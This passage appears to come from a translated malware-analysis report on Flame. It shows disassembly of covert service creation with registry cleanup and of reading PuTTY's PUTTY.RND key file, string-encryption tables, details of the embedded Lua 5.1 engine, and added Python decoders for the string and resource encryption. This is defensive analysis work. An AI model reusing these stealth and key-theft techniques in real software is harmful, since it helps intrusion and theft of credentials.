    push    DisplayName     ; lpDisplayName
    push    ServiceName     ; lpServiceName
    push    eax             ; hSCManager
    call    CreateServiceA
    cmp     eax, edi

    Immediately after the service is created it is started, then deleted, and the related registry traces are cleaned up.

    mov     eax, [ebx+4]
    mov     byte ptr [eax+6], 1
    call    start_service
    mov     [ebp-1], al
    mov     eax, edi
    call    delete_service
    cmp     al, 1
    jnz     0x1011BCD9

    Analysis of the string-encryption portion of each module

    The encryption portions of the individual modules have a great deal in common. The algorithm used works mainly as follows:

    Figure 3-5 Encryption algorithm

    The algorithm parameters and formulas used by each file are as follows:

    File name      Param a   Param b     Param c          M
    Mssecmgr.ocx   0xBh      0xBh+0xCh   [0x10376F70h]    M=(0xBh+n)*(0xBh+0xCh+n)+[0x101376F70h]
    Msglu32.ocx    0xBh      0xBh+0xCh   [0x101863ECh]    M=(0xBh+n)*(0xBh+0xCh+n)+[0x101863ECh]
    Advnetcfg.ocx  0x1Ah     0x5h        0                M==(0xAh+n)*(0x5h+n)
    Nteps32.ocx    0x1Ah     0x5h        0                M==(0xAh+n)*(0x5h+n)
    Soapr32.ocx    0x11h     0xBh        0                M==(0x11h+n)*(0xbh+n)
    Noname.dll     0x11h     0xBh        0                M==(0x11h+n)*(0xbh+n)
    Jimmy.dll      0xBh      0xBh+0x6h   0x58h            M=(0xbh+N)*(N+0xbh+0x6h)+0x58h
    Comspol32.ocx  0xBh      0xBh+0x6h   0                M=(0xbh+N)*(N+0xbh+0x6h)
    Browse32.ocx   0xBh      0xBh+0xch   0                M=(0xbh+N)*(N+0xbh+0xch)
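As an added example (not code from the Antiy report or from Flame), the following Python computes the per-position value M from the parameters in the table above and applies it to a byte string. It assumes, since Figure 3-5 is not reproduced on the page, that M is truncated to its low byte and XORed with the n-th byte of the string; the memory-resident Param c of Mssecmgr.ocx and Msglu32.ocx is not given on the page and must be supplied by the caller.

```python
from typing import Optional

# (a, b, c) per module, copied from the table above.  None means Param c is
# read from the module's memory and is not available on the page.  Advnetcfg.ocx
# and Nteps32.ocx are left out because the table lists 0x1A for Param a while
# their formula uses 0xA.
MODULE_PARAMS = {
    "Mssecmgr.ocx": (0xB, 0xB + 0xC, None),
    "Msglu32.ocx": (0xB, 0xB + 0xC, None),
    "Soapr32.ocx": (0x11, 0xB, 0),
    "Noname.dll": (0x11, 0xB, 0),
    "Jimmy.dll": (0xB, 0xB + 0x6, 0x58),
    "Comspol32.ocx": (0xB, 0xB + 0x6, 0),
    "Browse32.ocx": (0xB, 0xB + 0xC, 0),
}


def m_value(n: int, a: int, b: int, c: int) -> int:
    """M = (a + n) * (b + n) + c for string position n, exactly as in the table."""
    return (a + n) * (b + n) + c


def keystream(length: int, a: int, b: int, c: int) -> bytes:
    """Low byte of M for positions 0 .. length-1 (byte truncation is an assumption)."""
    return bytes(m_value(n, a, b, c) & 0xFF for n in range(length))


def xor_apply(data: bytes, module: str, c_override: Optional[int] = None) -> bytes:
    """XOR data with the module's keystream.  Under the XOR assumption the same
    call both encodes and decodes."""
    a, b, c = MODULE_PARAMS[module]
    if c is None:
        if c_override is None:
            raise ValueError(f"{module}: Param c lives in the module; pass c_override")
        c = c_override
    return bytes(x ^ k for x, k in zip(data, keystream(len(data), a, b, c)))


if __name__ == "__main__":
    # Constructed sample input, not an actual Flame string.
    sample = b"HOMEPATH"
    enc = xor_apply(sample, "Browse32.ocx")
    print(enc.hex(), xor_apply(enc, "Browse32.ocx"))
```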

    Flame was also found to read the contents of the temporary file that Putty creates when generating keys, possibly in order to break the communication key.
    %Documents and Settings%\Administrator\PUTTY.RND

    lea     eax, putty_file_path[eax]
    push    eax             ; lpBuffer
    push    offset str_HOMEPATH ; decode:"HOMEPATH"
    call    my_decode_strA  ; decode: "HOMEPATH"
    pop     ecx
    push    eax             ; lpName
    call    edi ; GetEnvironmentVariableA
    test    eax, eax
    jnz     short 0x10073E35
    push    esi             ; uSize
    push    ebx             ; lpBuffer
    call    ds:GetWindowsDirectoryA
    push    ebx             ; c1
    call    0x101A1370
    pop     ecx
    mov     esi, eax
    jmp     short 0x10073E3B
    add     [ebp+var_4], eax
    mov     esi, [ebp+var_4]
    push    offset str_PUTTY_RND ; data
    call    my_decode_strA  ; decode : "\PUTTY.RND"
    push    eax
    lea     eax, putty_file_path[esi]
    push    eax
    call    0x101A1270  ;  cat path

    push    ebx             ; hTemplateFile
    push    ebx             ; dwFlagsAndAttributes
    push    3               ; dwCreationDisposition
    push    ebx             ; lpSecurityAttributes
    push    3               ; dwShareMode
    push    80000000h       ; dwDesiredAccess
    push    offset putty_file_path ; lpFileName
    call    ds:CreateFileA
    cmp     eax, 0FFFFFFFFh
    mov     [ebp+hObject], eax
    jz      short 0x10073EE6
    push    esi
    mov     esi, ds:ReadFile    ;read putty.rnd file

    Figure 3-6 Some Lua module names found in memory

    The corresponding Lua source file reads:

    const char *const luaP_opnames[NUM_OPCODES+1] = {
      "MOVE",
      "LOADK",
      "LOADBOOL",
      "LOADNIL",
      "GETUPVAL",
      "GETGLOBAL",
      "GETTABLE",
      "SETGLOBAL",
      "SETUPVAL",
      "SETTABLE",
      "NEWTABLE",
      "SELF",
      "ADD",
      "SUB",
      "MUL",
      "DIV",
      "MOD",
      "POW",
      "UNM",
      "NOT",
      "LEN",
      "CONCAT",
      "JMP",
      "EQ",
      "LT",
      "LE",
      "TEST",
      "TESTSET",
      "CALL",
      "TAILCALL",
      "RETURN",
      "FORLOOP",
      "FORPREP",
      "TFORLOOP",
      "SETLIST",
      "CLOSE",
      "CLOSURE",
      "VARARG",
      NULL
    };

    The contents were found to be identical, and since a large amount of further Lua code was found during analysis, we conclude that the malicious code statically compiles the Lua code into the program.
    The Lua version embedded in Flame was found to be Lua 5.1:

    mov eax,edi
    call mssecmgr.100B8F0F
    push mssecmgr.1026195C     ;  ASCII "_G"
    mov eax,edi
    call mssecmgr.100B9417
    pop ecx
    mov eax,mssecmgr.10261778
    mov ebx,mssecmgr.10261960  ;  ASCII "_G"
    mov ecx,esi
    call mssecmgr.100B9DB3
    push 0x7
    push mssecmgr.10261964     ;  ASCII "Lua 5.1"
    mov eax,esi
    call mssecmgr.100B9142
    push mssecmgr.1026196C     ;  ASCII "_VERSION"
    mov eax,edi
    call mssecmgr.100B9417
    add esp,0xC
    push mssecmgr.100CF1E6
    push mssecmgr.100CF23B
    push mssecmgr.10261978     ;  ASCII "ipairs"
    mov eax,esi
    call mssecmgr.100CFAE7
    add esp,0xC
    push mssecmgr.100CF171
    push mssecmgr.100CF1B0
    push mssecmgr.10261980     ;  ASCII "pairs"
    mov eax,esi
    call mssecmgr.100CFAE7
    add esp,0xC
    push 0x1
    push 0x0
    mov eax,esi
    call mssecmgr.100B932F
    or eax,-0x1
    call mssecmgr.100B8F0F
    push -0x2
    pop eax
    call mssecmgr.100B953A
    push 0x2
    push mssecmgr.10261988     ;  ASCII "kv"

    Figure 3-7 Flame code

    static void base_open (lua_State *L) {
      /* set global _G */
      lua_pushvalue(L, LUA_GLOBALSINDEX);
      lua_setglobal(L, "_G");
      /* open lib into global table */
      luaL_register(L, "_G", base_funcs);
      lua_pushliteral(L, LUA_VERSION);  /* LUA_VERSION : "Lua 5.1" */
      lua_setglobal(L, "_VERSION");  /* set global _VERSION */
      /* `ipairs' and `pairs' need auxiliary functions as upvalues */
      auxopen(L, "ipairs", luaB_ipairs, ipairsaux);
      auxopen(L, "pairs", luaB_pairs, luaB_next);
      /* `newproxy' needs a weaktable as upvalue */
      lua_createtable(L, 0, 1);  /* new table `w' */
      lua_pushvalue(L, -1);  /* `w' will be its own metatable */
      lua_setmetatable(L, -2);
      lua_pushliteral(L, "kv");
      lua_setfield(L, -2, "__mode");  /* metatable(w).__mode = "kv" */
      lua_pushcclosure(L, luaB_newproxy, 1);
      lua_setglobal(L, "newproxy");  /* set global `newproxy' */
    }

    Figure 3-8 Lua code

    The structure contained in Flame is consistent with Lua 5.1.

    Figure 3-9 Lua structure in Flame

    static const luaL_Reg base_funcs[] = {
      {"assert", luaB_assert},
      {"collectgarbage", luaB_collectgarbage},
      {"dofile", luaB_dofile},
      {"error", luaB_error},
      {"gcinfo", luaB_gcinfo},
      {"getfenv", luaB_getfenv},
      {"getmetatable", luaB_getmetatable},
      {"loadfile", luaB_loadfile},
      {"load", luaB_load},
      {"loadstring", luaB_loadstring},
      {"next", luaB_next},
      {"pcall", luaB_pcall},
      {"print", luaB_print},
      {"rawequal", luaB_rawequal},
      {"rawget", luaB_rawget},
      {"rawset", luaB_rawset},
      {"select", luaB_select},
      {"setfenv", luaB_setfenv},
      {"setmetatable", luaB_setmetatable},
      {"tonumber", luaB_tonumber},
      {"tostring", luaB_tostring},
      {"type", luaB_type},
      {"unpack", luaB_unpack},
      {"xpcall", luaB_xpcall},
      {NULL, NULL}
    };

    Figure 3-10 Structure in Lua 5.1

    Lua 5.1 was released on 21 February 2006 and Lua 5.2 on 16 December 2011, which indirectly indicates that Flame was developed between 21 February 2006 and 16 December 2011.
    At the same time, a large number of Lua script function names were found during analysis (see Appendix 7, which lists the Lua script functions used in the Mssecmgr.ocx file); these names help in judging what the Lua scripts do.
    At address 10266CE in the main program we found the array RawDES_Spbox, which can be used by the RawDES algorithm.
    Analysis of the functions that reference this address confirmed that the program does use the DES encryption algorithm. Specifically:
    The calling function contains 16 looped calculation expressions, a clear characteristic of the DES algorithm, and the XOR operations that follow each computed value also match the way DES computes.
    In the call to this function the third parameter is the encryption key:
    int  0x10084393 (int a1, unsigned int a2, int a3, int a4)
    The main module loads a resource into memory and decrypts it with a simple XOR. The algorithm is as follows:
    First DB DF AC A2 is passed in as the file header, then the resource is decrypted byte by byte.
    Each byte is checked against 0xA9:
    If it is 0xA9, it is XORed directly with the previous decrypted byte, and the result is the decrypted byte.
    If it is not, EDX is set to 0xA9, the byte is XORed with EDX, and the result is then XORed with the previous decrypted byte; that final result is the decrypted byte.

    10050898  mov al,byte ptr ds:[esi]
    1005089A  test al,al
    1005089C  je short 0x100508A9
    1005089E  cmp al,0xA9
    100508A0  je short 0x100508A9
    100508A2  mov edx,0xA9
    100508A7  jmp short 0x100508AB
    100508A9  xor edx,edx
    100508AB  xor al,dl
    100508AD  xor cl,al
    100508AF  mov byte ptr ds:[edi+esi],cl
    100508B2  inc esi
    100508B3  dec dword ptr ss:[esp+0xC]
    100508B7  jnz short 0x10050898
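As an added example (not code from the report or from Flame), the following Python follows the listing above instruction by instruction: a source byte of 0x00 or 0xA9 is taken as-is (test al,al and cmp al,0xA9 both branch to xor edx,edx, so the zero case the text does not mention is included), any other byte is first XORed with 0xA9, and the result is XORed into CL, the previous decrypted byte. The initial value of CL is not visible in the listing, so it is assumed to be a parameter (default 0); the DB DF AC A2 header mentioned in the text is outside this loop.

```python
def _mask(b: int) -> int:
    """EDX as chosen by the listing: 0 for 0x00 and 0xA9, otherwise 0xA9."""
    return 0 if b in (0x00, 0xA9) else 0xA9


def decode_resource(src: bytes, prev: int = 0) -> bytes:
    """Decrypt src byte by byte, chaining each output byte into the next (CL).
    prev is the assumed initial CL; the listing does not show where it comes from."""
    out = bytearray()
    cl = prev & 0xFF
    for al in src:
        al ^= _mask(al)      # xor al, dl
        cl ^= al             # xor cl, al
        out.append(cl)       # mov byte ptr [edi+esi], cl
    return bytes(out)


def encode_resource(plain: bytes, prev: int = 0) -> bytes:
    """Inverse of decode_resource, for building test vectors.  For each position
    t = plain[i] ^ previous plaintext byte must be produced by `al ^ mask(al)`;
    that map leaves 0x00 and 0xA9 unchanged and XORs every other byte with 0xA9,
    which is a bijection on bytes, so it inverts exactly."""
    out = bytearray()
    cl = prev & 0xFF
    for p in plain:
        t = p ^ cl
        out.append(t if t in (0x00, 0xA9) else t ^ 0xA9)
        cl = p
    return bytes(out)


if __name__ == "__main__":
    # Constructed sample input, not an actual Flame resource.
    blob = encode_resource(b"MZ\x90\x00\x03")
    print(blob.hex(), decode_resource(blob))
```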

    Summarising the analysis of Flame's calls into Lua shows how Flame invokes Lua scripts. During initialisation the program creates some tables in the Lua environment and stores key/value pairs in them; later it fetches a given table, takes the value stored under a given key, and executes that value as Lua code. As the code below shows, Flame's table names and key names are all stored encrypted and are decrypted only when used.

    mov eax,esi
    call mssecmgr.100B932F                   ;  lua_createtable
    mov esi,dword ptr ds:[edi+0xD4]
    push mssecmgr.10304B78
    call mssecmgr.1000E431                   ;  decode string "script"
    add esp,0xC
    push eax
    call mssecmgr.100B917A                   ;  lua_pushstring
    mov eax,dword ptr ds:[edi+0xBC]
    mov edx,dword ptr ds:[edi+0xD4]
    pop ecx
    push eax
    lea ecx,dword ptr ds:[edi+0xB0]
    call mssecmgr.1000757C
    push eax
    mov eax,edx
    call mssecmgr.100B9142                   ;  lua_pushlstring
    mov esi,dword ptr ds:[edi+0xD4]
    pop ecx
    pop ecx
    push -0x3
    pop eax
    call mssecmgr.100B93F4                   ;  lua_settable : set value
    lea ecx,dword ptr ds:[edi+0x8C]
    mov eax,dword ptr ds:[ecx]

    Figure 3-11 Setting the value of "script"

     

    mov esi,dword ptr ds:[ebx+0xD4]
    push mssecmgr.10304BB0
    call mssecmgr.1000E431                   ;  decode string "_params"
    pop ecx
    push eax
    mov eax,-0x2712
    call mssecmgr.100B9285                   ;  table name is "_params"
    mov esi,dword ptr ds:[ebx+0xD4]
    mov dword ptr ss:[esp],mssecmgr.10304BCC
    call mssecmgr.1000E431                   ;  decode string "script"
    pop ecx
    push eax
    call mssecmgr.100B917A                   ;  lua_pushstring
    mov esi,dword ptr ds:[ebx+0xD4]
    pop ecx
    push -0x2
    pop eax
    call mssecmgr.100B9269                   ;  lua_gettable get lua script
    mov esi,dword ptr ds:[ebx+0xD4]
    push -0x2
    pop eax
    call mssecmgr.100B8DFE                   ;  lua_remove
    mov eax,dword ptr ds:[ebx+0xD4]
    and dword ptr ss:[esp+0x10],0x0
    lea ecx,dword ptr ss:[esp+0x10]
    push ecx
    push -0x1
    push eax
    call mssecmgr.100B9C8B                   ;  luaL_checklstring
    mov esi,dword ptr ds:[ebx+0xD4]
    add esp,0xC
    push mssecmgr.10304BE8
    mov edi,eax
    call mssecmgr.1000E431                   ;  decode string "script"
    pop ecx
    push eax
    push dword ptr ss:[esp+0x14]
    mov eax,edi
    call mssecmgr.100BA0B2                   ;  luaL_loadbuffer load lua script
    test eax,eax
    pop ecx
    pop ecx
    jnz mssecmgr.100B8381
    mov ecx,dword ptr ds:[ebx+0xD4]
    xor edi,edi
    push eax
    inc edi
    call mssecmgr.100B966F                   ;  lua_pcall call lua script

    Figure 3-12 Reading and executing the value of "script"

    Analysis found that the encrypted strings include strings related to virtual printers and the names of many programs used for PDF conversion. We infer that Flame checks whether such software is installed on the machine and may use it to perform conversions.

    add     esp, 0Ch
    push    offset unk_102CA098
    call    near ptr my_decode_strW ; decode : "Microsoft Office Document Image Writer"
    ; Microsoft Office Document Imaging Writer, standalone install

    Some people want to convert PDF files into Word or JPEG and go looking for dedicated software to do it; those tools are not very convenient, and the virtual printer bundled with Office can do the conversion quickly.
    1. PDF to Word: open the file in Adobe Reader, choose Print, select Microsoft Office Document Imaging Writer as the printer and print. This produces a series of *.mdi files; open them with Microsoft Office Document Imaging (an Office tool) and use "Send to Word" under Tools to complete the conversion (the accuracy is much higher than with software such as Shangshu).
    2. PDF to JPEG: convert the PDF to MDI as above, then use Microsoft Office Document Imaging to save the MDI as *.tag image files, which most drawing programs can open, and use one of them to save the files as JPEG (this method suits converting a whole document; everyone knows how to copy a portion, so there is no need to belabour it).

    add     esp, 4
    mov     [ebp+var_A0], eax
    push    offset unk_102CA148
    call    near ptr my_decode_strW ; decode : "Microsoft XPS Document Writer"
    ; also a Windows virtual printer